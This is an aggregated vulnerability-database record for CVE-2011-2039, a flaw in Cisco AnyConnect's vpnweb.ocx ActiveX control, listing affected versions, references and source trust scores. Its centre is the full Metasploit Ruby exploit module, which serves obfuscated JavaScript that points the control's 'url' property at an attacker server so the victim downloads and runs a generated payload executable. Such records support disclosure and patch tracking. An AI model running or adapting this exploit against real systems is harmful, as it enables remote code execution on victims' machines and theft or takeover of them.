ID

VAR-E-201106-0065


CVE

cve_id:CVE-2011-2039

Trust: 2.4

cve_id:CVE-2011-2040

Trust: 0.3

sources: BID: 48081 // PACKETSTORM: 102055 // EXPLOIT-DB: 17366 // EDBNET: 39970

EDB ID

17366


TITLE

Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17366

DESCRIPTION

Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute (Metasploit). CVE-2011-2039CVE-72714 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17366

AFFECTED PRODUCTS

vendor:ciscomodel:anyconnect vpn clientscope: - version: -

Trust: 1.0

vendor:ciscomodel:anyconnect vpn client activex url property download and executescope: - version: -

Trust: 0.5

vendor:ciscomodel:anyconnect vpn clientscope:eqversion:2.4.202

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:eqversion:2.5

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:eqversion:2.3

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:neversion:3.0.629

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:neversion:2.5.3046

Trust: 0.3

vendor:ciscomodel:anyconnect secure mobility clientscope:neversion:2.3.185

Trust: 0.3

sources: BID: 48081 // PACKETSTORM: 102055 // EXPLOIT-DB: 17366

EXPLOIT

##
# $Id: cisco_anyconnect_exec.rb 12872 2011-06-06 20:15:51Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute',
'Description' => %q{
This module exploits a vulnerability in the Cisco AnyConnect VPN client
vpnweb.ocx ActiveX control. This control is typically used to install the
VPN client. An attacker can set the 'url' property which is where the control
tries to locate the files needed to install the client.

The control tries to download two files from the site specified within the
'url' property. One of these files it will be stored in a temporary directory and
executed.
},
'License' => MSF_LICENSE,
'Author' => [ 'bannedit' ],
'Version' => '$Revision: 12872 $',
'References' =>
[
[ 'CVE', '2011-2039' ],
[ 'OSVDB', '72714'],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909' ],
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml'],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86
}
],
],
'DisclosureDate' => 'Jun 01 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
end

def on_request_uri(cli, request)

if request.uri.match(/vpndownloader\.exe/)
exe = generate_payload_exe({:code => payload.encoded})

print_status("Client requested: #{request.uri}. Sending vpndownloader.exe")
send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
select(nil, nil, nil, 5) # let the file download
handler(cli)
return
end

if request.uri.match(/updates\.txt/)
print_status("Client requested: #{request.uri}. Sending updates.txt")
updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))
send_response(cli, updates, { 'Content-Type' => 'text/plain' })
return
end

url = get_uri(cli)

dir = rand_text_alpha((rand(40) + 1))
js = ::Rex::Exploitation::JSObfu.new %Q|
var x = document.createElement("object");
x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
x.url = "#{url}/#{dir}/";
|
js.obfuscate
html = "<html>\n\t<script>#{js}\t</script>\n</html>"
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end

Trust: 1.0

sources: EXPLOIT-DB: 17366

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 17366

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17366

TYPE

ActiveX URL Property Download and Execute (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 17366

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:activex

Trust: 0.5

sources: PACKETSTORM: 102055 // EXPLOIT-DB: 17366

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 17366

EXTERNAL IDS

db:NVDid:CVE-2011-2039

Trust: 2.4

db:EXPLOIT-DBid:17366

Trust: 1.6

db:EDBNETid:39970

Trust: 0.6

db:PACKETSTORMid:102055

Trust: 0.5

db:CERT/CCid:VU#490097

Trust: 0.3

db:NVDid:CVE-2011-2040

Trust: 0.3

db:BIDid:48081

Trust: 0.3

sources: BID: 48081 // PACKETSTORM: 102055 // EXPLOIT-DB: 17366 // EDBNET: 39970

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-2039

Trust: 2.1

url:http://www.cisco.com/en/us/products/products_security_advisory09186a0080b80123.shtml

Trust: 1.3

url:https://www.exploit-db.com/exploits/17366/

Trust: 0.6

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=910

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/490097

Trust: 0.3

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909

Trust: 0.3

url:http://www.cisco.com

Trust: 0.3

sources: BID: 48081 // PACKETSTORM: 102055 // EXPLOIT-DB: 17366 // EDBNET: 39970

SOURCES

db:BIDid:48081
db:PACKETSTORMid:102055
db:EXPLOIT-DBid:17366
db:EDBNETid:39970

LAST UPDATE DATE

2022-07-27T09:45:32.341000+00:00


SOURCES UPDATE DATE

db:BIDid:48081date:2011-07-07T17:10:00

SOURCES RELEASE DATE

db:BIDid:48081date:2011-06-01T00:00:00
db:PACKETSTORMid:102055date:2011-06-07T15:38:06
db:EXPLOIT-DBid:17366date:2011-06-06T00:00:00
db:EDBNETid:39970date:2011-06-06T00:00:00